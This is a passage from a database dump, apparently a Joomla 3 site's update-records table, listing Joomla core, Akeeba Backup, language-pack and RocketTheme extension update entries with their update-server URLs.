package','','pkg_akeeba','package','',0,'8.1.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-2.html',''),(32137,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32138,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32139,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32140,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32141,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32142,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32143,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32144,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32145,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32146,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32147,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32148,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32149,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32150,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32151,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32152,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32153,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32154,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32155,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32156,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32157,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32158,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32159,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32160,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32161,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32162,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32163,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32164,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32165,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32166,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32167,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32168,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32169,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32170,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32171,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32172,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32173,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32174,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32175,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32176,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32177,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32178,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32179,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32180,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32181,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32182,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32183,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32184,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32185,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32186,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32187,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32188,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32189,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32190,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32191,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32192,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32193,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32194,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32195,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32196,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32197,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32198,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32199,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32200,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32201,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32202,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32203,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32204,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32205,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32206,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32207,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32208,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32209,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32210,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32211,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32212,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32213,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32214,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32215,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32216,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32217,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32218,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32219,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32220,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32221,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32222,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32223,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32224,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32225,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32226,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32227,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32228,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32229,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32230,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32231,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32232,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32233,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32234,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32235,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32236,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32237,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32238,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32239,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32240,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32241,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32242,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-3.html',''),(32243,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32244,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32245,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32246,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32247,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32248,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32249,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32250,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32251,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32252,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32253,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32254,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32255,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32256,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32257,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32258,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32259,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32260,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32261,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32262,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32263,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32264,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32265,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32266,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32267,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32268,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32269,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32270,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32271,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32272,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32273,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32274,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32275,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32276,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32277,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32278,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32279,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32280,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32281,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32282,3,0,'French','','pkg_fr-FR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32283,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32284,3,0,'German','','pkg_de-DE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32285,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32286,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32287,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32288,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32289,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32290,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32291,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32292,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32293,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32294,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32295,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32296,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32297,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32298,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32299,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32300,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(32301,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(32302,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.7.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(32303,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(32304,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(32305,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(32306,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(32307,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(32308,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(32309,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(32310,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(32311,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(32312,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(32313,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(32314,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(32315,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(32316,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(32317,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32318,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(32319,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(32320,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(32321,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(32322,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(32323,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(32324,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(32325,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(32326,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(32327,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(32328,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(32329,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(32330,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32331,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32332,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32333,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32334,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32335,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32336,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32337,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32338,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32339,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32340,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32341,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32342,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32343,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32344,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32345,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32346,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32347,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32348,57,0,'French','','pkg_fr-FR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32349,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32350,57,0,'German','','pkg_de-DE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32351,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32352,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32353,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32354,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32355,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32356,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32357,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32358,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32359,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32360,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32361,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32362,57,0,'Norwegian 